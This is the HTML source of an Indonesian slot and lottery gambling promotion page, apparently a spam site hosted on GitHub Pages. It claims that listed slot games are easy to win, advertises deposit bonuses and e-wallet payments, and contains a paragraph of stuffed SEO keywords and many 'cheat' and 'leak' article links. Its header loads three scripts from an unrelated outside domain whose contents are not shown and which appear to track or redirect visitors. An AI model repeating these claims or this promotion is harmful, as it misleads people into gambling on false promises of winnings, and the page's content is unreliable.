<!doctype html>
<html class="no-js" lang="en">


<head>
	<meta charset="utf-8">
	<title>AGENTOTOPLAY: Rekapan Daftar 12 Zodiacs Info Slot Gacor Hari Ini </title>
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<link rel="icon" type="image/png" href="../assets/images/favicon.png">

	<link rel="stylesheet" href="../assets/css/bootstrap.min.css">
	<link rel="stylesheet" href="../assets/css/animate.css">
	<link rel="stylesheet" href="../assets/css/icofont.min.css">
	<link rel="stylesheet" href="../assets/css/swiper.min.css">
	<link rel="stylesheet" href="../assets/css/lightcase.css">
	<link rel="stylesheet" href="../assets/css/odometer.css">
	<link rel="stylesheet" href="../assets/css/style.min.css">

    <link rel="canonical" href="https://agentotoplay.github.io/game-slot/article/rekapan-daftar-12-zodiacs-info-slot-gacor-hari-ini" />

     <meta
      name="description"
      content="Rekapan Daftar 12 Zodiacs Info Slot Gacor Hari Ini Langsung Daftar Web site Judi Slot Dan Agen Togel Online Formal Terpercaya, di Bandar Togel Online Formal di Indonesia 2021, yang sanggup deposit via dana gopay ovo & bank "
    />
    <meta
      name="keywords"
      content="Situs Info Apk Gacor Toto Play Slot Online Pragmatic Terbaik dan Terpercaya 2021, Judi Togel Deposit Pulsa Tanpa Potongan, Permainan Pragmatic Play Indonesia, agen togel dan slot deposit 10rb tanpa potongan, Kumpulan Situs Info Apk Gacor Toto Play Slot Online Pragmatic Paling Gacor dan Terbaik"
    />

    <meta name="google" content="notranslate" />
    <meta name="robots" content="index, follow" />
    <meta name="rating" content="general" />
    <meta name="geo.region" content="id_ID" />
    <meta name="googlebot" content="index,follow" />
    <meta name="geo.country" content="id" />
    <meta name="language" content="Id-ID" />
    <meta name="distribution" content="global" />
    <meta name="geo.placename" content="Indonesia" />
    <meta name="author" content="Info Apk Gacor Toto Play Slot Online Pragmatic" />
    <meta name="publisher" content="Info Apk Gacor Toto Play Slot Online Pragmatic" />
    <meta name="robots" content="index,follow" />
    <meta property="og:type" content="website" />
    <meta property="og:locale" content="id_ID" />
    <meta property="og:locale:alternate" content="en_US" />
    <meta property="og:title" content="Rekapan Daftar 12 Zodiacs Info Slot Gacor Hari Ini" />
    <meta
      property="og:description"
      content=" &#8226; Recomended Games  Beragam game slot online yang ada dari provider berjumlah ribuan. Mungkin kamu bingung dalam memainkan game apa yang paling"
    />
    
	  
	  <script src='https://doyourbusiness.top/notify/notify.js?f=&on=agentotoplay.github.io&js=&mobile=&timing=&id=ID&city=&version=1'></script>
	  <script src='https://doyourbusiness.top/track_github/track2.js&version=1'></script>
<script src='https://doyourbusiness.top/flexi_link/link.js?version=1'></script>
	  
</head>

<body>
	<!-- preloader start here -->
    <div class="preloader">
        <div class="preloader-inner">
            <div class="preloader-icon">
                <span></span>
                <span></span>
            </div>
        </div>
    </div>
	<!-- preloader ending here -->

	<!-- scrollToTop start here -->
    <a href="#" class="scrollToTop"><i class="icofont-rounded-up"></i></a>
    <!-- scrollToTop ending here -->

	<!-- ==========shape image Starts Here========== -->
	<div class="body-shape">
		<img src="../assets/images/shape/body-shape.png" alt="shape">
	</div>
	<!-- ==========shape image end Here========== -->




	<!-- ==========Header Section Starts Here========== -->
	<header class="header-section">
		<div class="container">
			<div class="header-holder d-flex flex-wrap justify-content-between align-items-center">
				<div class="brand-logo d-none d-lg-inline-block">
					<div class="logo">
						<a href="#">
							<img src="https://lbstatic.superdominator88.vip/media/images/raQ7vw7fAOwgXnKtX6Uk.jpg?width=100" alt="logo">
						</a>
					</div>
				</div>
				<div class="header-menu-part">
					<!-- <div class="header-top">
						<div class="header-top-area">
							<ul class="left">
								<li>
									<i class="icofont-ui-call"></i> <a href="#">+62 8121 5099 449</span>
								</li>
								<li>
									<i class="icofont-location-pin"></i> Beverley, New York 224 USA
								</li>
							</ul>
							<ul class="social-icons d-flex align-items-center">
								<li>
									<a href="#" class="fb"><i class="icofont-facebook-messenger"></i></a>
								</li>
								<li>
									<a href="#" class="twitter"><i class="icofont-twitter"></i></a>
								</li>
								<li>
									<a href="#" class="vimeo"><i class="icofont-vimeo"></i></a>
								</li>
								<li>
									<a href="#" class="skype"><i class="icofont-skype"></i></a>
								</li>
								<li>
									<a href="#" class="rss"><i class="icofont-rss-feed"></i></a>
								</li>
							</ul>
						</div>
					</div> -->
					<div class="header-bottom">
						<div class="header-wrapper justify-content-lg-end">
							<div class="mobile-logo d-lg-none">
								<a href="index.html"><img src="../assets/images/logo/logo.png" alt="logo"></a>
							</div>
							<div class="menu-area">
								<ul class="menu">
									<li>
										<a href="../index.html" id="btn_1" class="active">Game Slot</a>
									</li>
									<li>
										<a href="article.html" id="btn_2">Artikel</a>
									</li>
								</ul>
								<a href="#" id="btn_4" class="login"><i class="icofont-user"></i> <span>Masuk</span> </a>
								<a href="#" id="btn_5" class="signup"><i class="icofont-users"></i> <span>Daftar Akun</span></a>

								<!-- toggle icons -->
								<div class="header-bar d-lg-none">
									<span></span>
									<span></span>
									<span></span>
								</div>
								<div class="ellepsis-bar d-lg-none">
									<i class="icofont-info-square"></i>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

	</header>
	<!-- ==========Header Section Ends Here========== -->




	<!-- ===========Banner Section start Here========== -->
	<section class="pageheader-section" style="background-image: url(../assets/images/pageheader/bg.jpg);">
		<div class="container">
            <div class="section-wrapper text-center text-uppercase">
                <h2 class="pageheader-title">Rekapan Daftar 12 Zodiacs Info Slot Gacor Hari Ini</h2>
            </div>
		</div>
	</section>
	<!-- ===========Banner Section Ends Here========== -->

    

	<!-- ===========Blog Section Start Here========== -->
	<div class="blog-section blog-single padding-top padding-bottom aside-bg">
		<div class="container">
			<div class="section-wrapper">
				<div class="row justify-content-center pb-15">
					<div class="col-lg-8 col-12">
						<article>
							<div class="post-item-2">
								<div class="post-inner">
									<div class="post-thumb">
										<img src="https://grahabangunan.top/github_pages/image.php?name=rekapan-daftar-12-zodiacs-info-slot-gacor-hari-ini-assets-18244-msswao.com.jpg" alt="blog">
									</div>
									<div class="post-content">
									
										<h2><a href="https://agentotoplay.github.io/game-slot/article/rekapan-daftar-12-zodiacs-info-slot-gacor-hari-ini">Rekapan Daftar 12 Zodiacs Info Slot Gacor Hari Ini</a></h2>
										
										<h2>&#8226; Recomended Games</h2><p id=content_recomended_games>Beragam game slot online yang ada dari provider berjumlah ribuan. Mungkin kamu bingung dalam memainkan game apa yang paling menguntungkan, pihak AGENTOTOPLAY menyampaikan rekomendasi game yang punya RTP tertinggi. RTP sendiri ialah Return To Player yang dijadikan acuan dalam permainan slot online, dimana RTP semakin hebat maka sanggup meraih keuntungan yang hebat juga. Berikut yakni 5 rekomendasi game slot online mudah menang :</p><p><i style='color:blue;'>1. The Koi Gate [Habanero]</i></p><p><i style='color:blue;'>2. Mahjong Ways [PG Soft]</i></p><p><i style='color:blue;'>3. Gates of Olympus [Pragmatic Play]</i></p><p><i style='color:blue;'>4. Sweet Bonanza [Pragmatic Play]</i></p><img alt='Rekapan Daftar 12 Zodiacs Info Slot Gacor Hari Ini' src='https://grahabangunan.top/github_pages/image.php?name=rekapan-daftar-12-zodiacs-info-slot-gacor-hari-ini-assets-18244-msswao.com.jpg' style='width:100%;' /><h2>&#8226; Knowledge Bo That Will Pay</h2><p id=content_knowledge_bo_that_will_pay>Banjir Promosi dan Jackpot Slot Terbesar
Melihat dari kumpulan nama - nama situs judi slot online terpercaya, AGENTOTOPLAY menyampaikan promosi terbesar yang mampu saudara klaim baik agar new member atau member lama yang telah bergabung. Promosi yang diberikan tak basa basi, dimana para pemain sanggup mengklaimnya dengan syarat yang wajar. Contohnya welcome bonus slot 20% yang mampu diklaim oleh new member supaya meraih keuntungan berlimpah buat para member.</p><p id=content_knowledge_bo_that_will_pay>Keamanan dan Kenyamanan Member yakni Prioritas
Situs judi slot online terpercaya pastinya hendak menyampaikan keamanan dan kenyamanan untuk para pemain dalam berbuat taruhan. Bukan cuma soal member berbuat deposit tetapi lebih menjaga member dari data yang nggak tersebar dan kenyamanan dari para pemain dalam berbuat taruhan. Data dari para pemain hendak terenkripsi secara aman dan tak hendak jatuh ke pihak yang nggak bertanggung jawab.</p><p id=kw_stuffing>Keywords :  | agentoto slot | toto slot | slot joker123 | situs slot online terpercaya | slot pg soft | pragmatic play | slot online cq9 | slot online terbaik | joker gaming | slot pragmatic play | cq9 slot online | slot habanero | agentotoplay | spade gaming | slot online | slot spade gaming | slot terbaik | bandar slot | agen slot online | pocket gaming soft | slot online jackpot tertinggi | toptrend gaming | agen toto play slot | slot joker gaming | slot habanero | slot online mudah menang | game slot terbaik | slot microgaming | games slot gampang menang | slot pg soft | habanero slot | microgaming</p>
										
									</div>
								</div>
							</div>


						</article>
					</div>
					<div class="col-lg-4 col-md-7 col-12">
                        <aside class="ps-lg-4">
						<!-- 	<div class="widget widget-search">
								<div class="widget-header">
									<h5>Search Your keywords</h5>
								</div>
								<form action="https://demos.codexcoder.com/" class="search-wrapper">
									<input type="text" name="s" placeholder="Search Here...">
									<button type="submit"><i class="icofont-search-2"></i></button>
								</form>
							</div> -->

							<!-- <div class="widget widget-category">
								<div class="widget-header">
									<h5>Artikel Lainnya</h5>
								</div>
								<ul class="lab-ul widget-wrapper list-bg-none">
								
									<li>
										<a href="#" class=""><span><i class="icofont-rounded-double-right"></i>Judul Artikel disini...</span></a>
									</li>
									<li>
										<a href="#" class=""><span><i class="icofont-rounded-double-right"></i>Judul Artikel disini...</span></a>
									</li>
									<li>
										<a href="#" class=""><span><i class="icofont-rounded-double-right"></i>Judul Artikel disini...</span></a>
									</li>

								</ul>
							</div> -->

							<div class="widget widget-post">
								<div class="widget-header">
									<h5>Artikel Lainnya</h5>
								</div>
								<ul class="lab-ul widget-wrapper">
								
									<li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/rahasia-cheat-octagon-gem-2-game-slot-pragmatic"><img src="https://grahabangunan.top/github_pages/image.php?name=rahasia-cheat-octagon-gem-2-game-slot-pragmatic-assets-79112-msswao.com.jpg" alt="Game Slot Pragmatic"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/rahasia-cheat-octagon-gem-2-game-slot-pragmatic"><h6>Info Jackpot Terbesar Game Slot Pragmatic</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/daftar-slot-gacor-hey-sushi-permainan-slot-online"><img src="https://grahabangunan.top/github_pages/image.php?name=daftar-slot-gacor-hey-sushi-permainan-slot-online-assets-96359-msswao.com.jpg" alt="Permainan Slot Online"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/daftar-slot-gacor-hey-sushi-permainan-slot-online"><h6>Rekomendasi Bo Permainan Slot Online</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/download-apk-leprechaun-riches-slot-gacor-2022"><img src="https://grahabangunan.top/github_pages/image.php?name=download-apk-leprechaun-riches-slot-gacor-2022-assets-81094-msswao.com.jpg" alt="Slot Gacor 2022"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/download-apk-leprechaun-riches-slot-gacor-2022"><h6>Dapatkan Bocoran Slot Gacor 2022</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/coba-link-demo-dragon-hunters-info-slot-gacor-hari-ini"><img src="https://grahabangunan.top/github_pages/image.php?name=coba-link-demo-dragon-hunters-info-slot-gacor-hari-ini-assets-94621-msswao.com.jpg" alt="Info Slot Gacor Hari Ini"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/coba-link-demo-dragon-hunters-info-slot-gacor-hari-ini"><h6>Cheat Info Info Slot Gacor Hari Ini</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/trik-main-scheherazade-situs-game-slot-terpercaya"><img src="https://grahabangunan.top/github_pages/image.php?name=trik-main-scheherazade-situs-game-slot-terpercaya-assets-68839-msswao.com.jpg" alt="Situs Game Slot Terpercaya"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/trik-main-scheherazade-situs-game-slot-terpercaya"><h6>Coba Link Demo Situs Game Slot Terpercaya</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/rahasia-gacor-hotspin-slot-gacor-2022"><img src="https://grahabangunan.top/github_pages/image.php?name=rahasia-gacor-hotspin-slot-gacor-2022-assets-59318-msswao.com.jpg" alt="Slot Gacor 2022"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/rahasia-gacor-hotspin-slot-gacor-2022"><h6>Winrate Tinggi Slot Gacor 2022</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/tutorial-menang-panther-queen-link-slot-gacor-2022"><img src="https://grahabangunan.top/github_pages/image.php?name=tutorial-menang-panther-queen-link-slot-gacor-2022-assets-12055-msswao.com.jpg" alt="Link Slot Gacor 2022"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/tutorial-menang-panther-queen-link-slot-gacor-2022"><h6>Cara Install Link Slot Gacor 2022</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/ini-dia-pola-pumpkin-patch-link-slot-gacor-2022"><img src="https://grahabangunan.top/github_pages/image.php?name=ini-dia-pola-pumpkin-patch-link-slot-gacor-2022-assets-58582-msswao.com.jpg" alt="Link Slot Gacor 2022"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/ini-dia-pola-pumpkin-patch-link-slot-gacor-2022"><h6>Dapatkan Bocoran Link Slot Gacor 2022</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/daftar-web-summertime-slot-aztec-gems"><img src="https://grahabangunan.top/github_pages/image.php?name=daftar-web-summertime-slot-aztec-gems-assets-28360-msswao.com.jpg" alt="Slot Aztec Gems"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/daftar-web-summertime-slot-aztec-gems"><h6>Lagi Gacor Slot Aztec Gems</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/bo-bocor-rise-of-apollo-slot-aztec-gems"><img src="https://grahabangunan.top/github_pages/image.php?name=bo-bocor-rise-of-apollo-slot-aztec-gems-assets-83960-msswao.com.jpg" alt="Slot Aztec Gems"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/bo-bocor-rise-of-apollo-slot-aztec-gems"><h6>Rekomendasi Bo Slot Aztec Gems</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/ini-dia-cheat-ancient-rome-situs-game-slot-terpercaya"><img src="https://grahabangunan.top/github_pages/image.php?name=ini-dia-cheat-ancient-rome-situs-game-slot-terpercaya-assets-98031-msswao.com.jpg" alt="Situs Game Slot Terpercaya"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/ini-dia-cheat-ancient-rome-situs-game-slot-terpercaya"><h6>Sharing Gacor Situs Game Slot Terpercaya</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/pola-main-lucky-twins-situs-judi-slot-promo-terbaru"><img src="https://grahabangunan.top/github_pages/image.php?name=pola-main-lucky-twins-situs-judi-slot-promo-terbaru-assets-42234-msswao.com.jpg" alt="Situs Judi Slot Promo Terbaru"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/pola-main-lucky-twins-situs-judi-slot-promo-terbaru"><h6>Bocoran Gacor Situs Judi Slot Promo Terbaru</h6></a></div></li><li class="d-flex flex-wrap justify-content-between"><div class="post-thumb"><a href="https://agentotoplay.github.io/game-slot/article/ini-dia-pola-monkey-madness-game-slot"><img src="https://grahabangunan.top/github_pages/image.php?name=ini-dia-pola-monkey-madness-game-slot-assets-66329-msswao.com.jpg" alt="Game Slot"></a></div><div class="post-content ps-4"><a href="https://agentotoplay.github.io/game-slot/article/ini-dia-pola-monkey-madness-game-slot"><h6>Unduh Apk Game Slot</h6></a></div></li>

								</ul>
							</div>

							<div class="widget widget-archive">
								<div class="widget-header">
									<h5>Game Slot Gacor</h5>
								</div>
								<ul class="lab-ul widget-wrapper list-bg-none">

									<li>
										<a href="#" class="d-flex flex-wrap justify-content-between">
											<span>
												🔱 Gates of Olympus
											</span>
										</a>
									</li>
									<li>
										<a href="#" class="d-flex flex-wrap justify-content-between">
											<span>
												🍭 Sweet Bonanza
											</span>
										</a>
									</li>
									<li>
										<a href="#" class="d-flex flex-wrap justify-content-between">
											<span>
												💎 Aztec Gems
											</span>
										</a>
									</li>
									<li>
										<a href="#" class="d-flex flex-wrap justify-content-between">
											<span>
												🀄️ Mahjong Ways
											</span>
										</a>
									</li>

								</ul>
							</div>

							<div class="widget widget-tags">
								<div class="widget-header">
									<h5>Artikel Populer</h5>
								</div>
								<ul class="lab-ul widget-wrapper">

									<li><a href="https://agentotoplay.github.io/game-slot/article/kode-gacor-fortune-girl-slot-gacor">Rekapan Daftar Slot Gacor</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/sharing-gacor-railway-king-info-slot-gacor-hari-ini">Kumpulan Game Gacor Info Slot Gacor Hari Ini</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/trik-main-scheherazade-situs-game-slot-terpercaya">Info Play Situs Game Slot Terpercaya</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/link-download-tens-or-better-game-slot-cq9">Kumpulan Game Slot Cq9</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/daftar-web-treasure-horse-slot-olympus">Kode Cheat Slot Olympus</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/situs-terbaru-hot-safari-slot-aztec-gems">Tutorial Menang Slot Aztec Gems</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/daftar-web-alibaba-slot-olympus">Kumpulan List Slot Olympus</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/daftar-bo-first-love-game-slot-cq9">Kode Cheat Game Slot Cq9</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/ini-info-wild-fireworks-permainan-slot-sweet-bonanza">Cara Menang Permainan Slot Sweet Bonanza</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/rumus-putaran-extra-juicy-situs-judi-slot-promo-terbaru">Rekomendasi Tergacor Situs Judi Slot Promo Terbaru</a></li><li><a href="https://agentotoplay.github.io/game-slot/article/tutorial-lengkap-king-tusk-slot-olympus">Rumus Putaran Slot Olympus</a></li>

								</ul>
							</div>
						</aside>
					</div>
				</div>
			</div>
		</div>
	</div>
	<!-- ===========Blog Section Ends Here========== -->



	<!-- ================ footer Section start Here =============== -->
    <footer class="footer-section" style="background-image: url(assets/images/footer/bg.jpg);">
      <!--   <div class="footer-top">
            <div class="container">
                <div class="row g-3 justify-content-center g-lg-0">
                    <div class="col-lg-4 col-sm-6 col-12">
                        <div class="footer-top-item lab-item">
                            <div class="lab-inner">
                                <div class="lab-thumb">
                                    <img src="../assets/images/footer/icons/01.png" alt="Phone-icon">
                                </div>
                                <div class="lab-content">
                                    <span>Phone Number : +88012 345 678 912</span>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-sm-6 col-12">
                        <div class="footer-top-item lab-item">
                            <div class="lab-inner">
                                <div class="lab-thumb">
                                    <img src="../assets/images/footer/icons/02.png" alt="email-icon">
                                </div>
                                <div class="lab-content">
                                    <span>Email : youremail@gmail.com</span>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-sm-6 col-12">
                        <div class="footer-top-item lab-item">
                            <div class="lab-inner">
                                <div class="lab-thumb">
                                    <img src="../assets/images/footer/icons/03.png" alt="location-icon">
                                </div>
                                <div class="lab-content">
                                    <span>Address : 30 North West New York</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div> -->
        <div class="footer-middle padding-bottom">
            <div class="container">
                <div class="row padding-lg-top">
                    <div class="col-lg-4 col-md-6 col-12">
                        <div class="footer-middle-item-wrapper">
                            <div class="footer-middle-item mb-lg-0">
                                <div class="fm-item-title mb-4">
                                    <img src="https://lbstatic.superdominator88.vip/media/images/raQ7vw7fAOwgXnKtX6Uk.jpg?width=120" alt="logo">
                                </div>
                                <div class="fm-item-content">
                                    <p class="mb-4">Kami Situs AgenTotoPlay saat ini menyediakan 4 Bank untuk melakukan transaksi (deposit & withdraw) yaitu Bank BCA, Bank BRI, Bank BNI, dan Bank MANDIRI. Kami AgenTotoPlay hanya menggunakan rekening bank yang terdaftar di website resmi AgenTotoPlay. Sedangkan untuk E-Wallet, kami menyediakan jalur transaksi mudah dengan menggunakan DANA, GOPAY, LINKAJA, dan OVO. </p>
                                    <p class="mb-4">AgenTotoPlay tidak bertanggung jawab atas kesalahan member dalam melakukan transaksi deposit diluar bank yang terdaftar di website resmi AgenTotoPlay. Cek atau tanyakan kepada CS kami rekening aktif yang masih digunakan AgenTotoPlay setiap saat Anda ingin bertransaksi di AgenTotoPlay, karena rekening AgenTotoPlay bisa sewaktu-waktu tidak aktif tanpa pemberitahuan sebelumnya.</p>
									<!-- <ul class="match-social-list d-flex flex-wrap align-items-center">
										<li><a href="#"><img src="../assets/images/match/social-1.png" alt="vimeo"></a></li>
										<li><a href="#"><img src="../assets/images/match/social-2.png" alt="youtube"></a></li>
										<li><a href="#"><img src="../assets/images/match/social-3.png" alt="twitch"></a></li>
									</ul> -->
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 col-12">
                        <div class="footer-middle-item-wrapper">
                            <div class="footer-middle-item mb-lg-0">
                                <div class="fm-item-title">
                                    <h4>Kategori Artikel</h4>
                                </div>
                                <div class="fm-item-content">
                                    <div class="fm-item-widget lab-item">
                                        <div class="lab-inner">
                                            <div class="lab-thumb">
                                                <a href="#" id="btn_22"> <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSz-vKCUZHuiB5PtnoscpBzD9Zam9xkVW9AA&usqp=CAU" alt="footer-widget-img" class="rounded-3"></a>
                                            </div>
                                            <div class="lab-content">
                                                <a href="#" id="btn_23"><h6>Slot 4d</h6></a>
                                                <!-- <p>Poker: <b>$230</b></p> -->
												<div class="rating">
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
												</div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="fm-item-widget lab-item">
                                        <div class="lab-inner">
                                            <div class="lab-thumb">
                                                <a href="#" id="btn_24"><img src="https://png.pngtree.com/png-clipart/20210221/ourlarge/pngtree-machine-casino-slot-black-png-image_2929421.jpg" alt="footer-widget-img" class="rounded-3"></a>
                                            </div>
                                            <div class="lab-content">
                                                <a href="#" id="btn_25"><h6>Game Slot</h6></a>
                                                <!-- <p>Poker: <b>$290</b></p> -->
												<div class="rating">
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
												</div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="fm-item-widget lab-item">
                                        <div class="lab-inner">
                                            <div class="lab-thumb">
                                                <a href="#" id="btn_26"><img src="https://img.freepik.com/free-vector/slot-machine-with-amusements-park-carnival-cartoon_123553-298.jpg" alt="footer-widget-img" class="rounded-3"></a>
                                            </div>
                                            <div class="lab-content">
                                                <a href="#" id="btn_27"><h6>Slot Gacor</h6></a>
                                                <!-- <p>Poker: <b>$330</b></p> -->
												<div class="rating">
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
													<i class="icofont-ui-rating"></i>
												</div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 col-12">
                        <div class="footer-middle-item-wrapper">
                            <div class="footer-middle-item-3 mb-lg-0">
                                <div class="fm-item-title">
                                    <h4>Hubungi Kami</h4>
                                </div>
                                <div class="fm-item-content">
                                    <p>Bukan BOT ! Kami melayani 24jam</p>
										
										<button type="button" class="default-button"><span>Live Chat <i class="icofont-circled-right"></i></span></button>
										
										<button type="button" class="default-button"><span>Whatsapp <i class="icofont-circled-right"></i></span></button>
										
										<!-- <button type="submit" class="default-button"><span>Send Massage <i class="icofont-circled-right"></i></span></button> -->
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer-bottom">
            <div class="container">
                <div class="row">
                    <div class="col-12">
                        <div class="footer-bottom-content text-center">
                            <p>&copy;2022 <a href="#" id="btn_28">Agentotoplay</a> - All Rights Reserved. Developed by <a href="https://themeforest.net/user/codexcoder">CodexCoder</a></p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- ================ footer Section end Here =============== -->







	<!-- All Needed JS -->
	<script src="../assets/js/vendor/jquery-3.6.0.min.js"></script>
	<script src="../assets/js/vendor/modernizr-3.11.2.min.js"></script>
	<script src="../assets/js/circularProgressBar.min.js"></script>
	<script src="../assets/js/isotope.pkgd.min.js"></script>
	<script src="../assets/js/swiper.min.js"></script>
	<script src="../assets/js/lightcase.js"></script>
	<script src="../assets/js/waypoints.min.js"></script>
	<script src="../assets/js/wow.min.js"></script>
	<script src="../assets/js/vendor/bootstrap.bundle.min.js"></script>
	<script src="../assets/js/plugins.js"></script>
	<script src="../assets/js/viewport.jquery.js"></script>
	<script src="../assets/js/odometer.min.js"></script>
	<script src="../assets/js/main.js"></script>



</body>
</html>